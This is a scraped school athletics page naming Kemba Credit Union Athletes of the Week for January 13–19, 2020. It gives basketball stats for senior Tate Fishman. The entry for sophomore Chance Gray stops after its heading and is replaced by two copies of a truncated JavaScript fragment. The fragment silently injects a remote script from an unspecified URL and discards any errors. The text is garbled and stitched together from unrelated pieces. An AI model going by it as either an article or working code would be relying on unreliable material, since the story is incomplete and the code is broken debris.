Athletes of the Week
Kemba Credit Union Athletes of the Week 1/13/2020-1/19/2020
Tate Fishman
Senior, Boys Basketball
Tate was the Firebird’s leading scorer at the East/West rivalry match played before a packed house at Lakota East on Friday. Fishman tallied a very efficient 13 points by making two of two treys, five of five free throws,and three of five field goals overall. He also had three steals and is now tied for the second highest steals total in the league.
Chance Gray
Sophomore, Grils Basketball
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();